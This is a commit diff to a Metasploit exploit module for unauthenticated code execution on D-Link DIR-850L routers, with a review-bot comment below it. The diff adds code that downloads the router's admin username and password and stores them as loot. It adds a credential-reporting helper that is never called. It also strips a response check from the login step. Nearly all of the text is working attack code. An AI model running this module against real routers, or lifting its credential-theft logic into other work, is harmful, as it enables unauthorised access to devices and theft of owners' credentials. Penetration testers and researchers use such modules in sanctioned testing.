
Commit cddec8c

author
Austin
authored
download creds, stores in loot.
1 parent 40bcb3f commit cddec8c


1 file changed

+30
-1
lines changed


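--- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::HttpServer
 include Msf::Exploit::Remote::EXE
+include Msf::Auxiliary::Report
 include Msf::Exploit::FileDropper
 
 def initialize(info = {})
@@ -54,6 +55,32 @@ def initialize(info = {})
 ])
 end
 
+def report_cred(opts)
+service_data = {
+address: opts[:ip],
+port: opts[:port],
+service_name: opts[:service_name],
+protocol: 'tcp',
+workspace_id: myworkspace_id
+}
+
+credential_data = {
+origin_type: :service,
+module_fullname: fullname,
+username: opts[:user],
+private_data: opts[:password],
+private_type: :password
+}.merge(service_data)
+
+login_data = {
+core: create_credential(credential_data),
+status: Metasploit::Model::Login::Status::UNTRIED,
+proof: opts[:proof]
+}.merge(service_data)
+
+create_credential_login(login_data)
+end
+
 def retrieve_creds
 begin
 xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
@@ -79,6 +106,8 @@ def retrieve_creds
 username = parse.at('//name').text
 password = parse.at('//password').text
 vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
+loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
+print_good("#{peer} - Downloaded credentials to #{loot}")
 return username, password
 rescue ::Rex::ConnectionError
 fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
@@ -104,7 +133,7 @@ def login(username, password)
 uid, challenge = retrieve_uid
 begin
 hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
-res = send_request_cgi({
+send_request_cgi({
 'uri' => '/authentication.cgi',
 'method' => 'POST',
 'data' => "id=#{username}&password=#{hash}",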
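Review bot: `report_cred` is added in the second hunk together with the `Msf::Auxiliary::Report` mixin, but none of the 30 added lines calls it, so as committed the helper is dead code and the recovered login is recorded only as a raw loot file. Either call it in `retrieve_creds` after `store_loot`, e.g. `report_cred(ip: rhost, port: rport, service_name: 'http', user: username, password: password, proof: res.body)`, or drop the helper until it is used. `store_loot` also saves the whole response body and `vprint_good` echoes the password in clear text, so the loot directory and console logs from a test hold live device credentials and should be handled as sensitive engagement data. In the last hunk the `res =` assignment is removed rather than checked; `login` continues outside the hunk, but if nothing later inspects the response, a failed authentication goes unnoticed.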
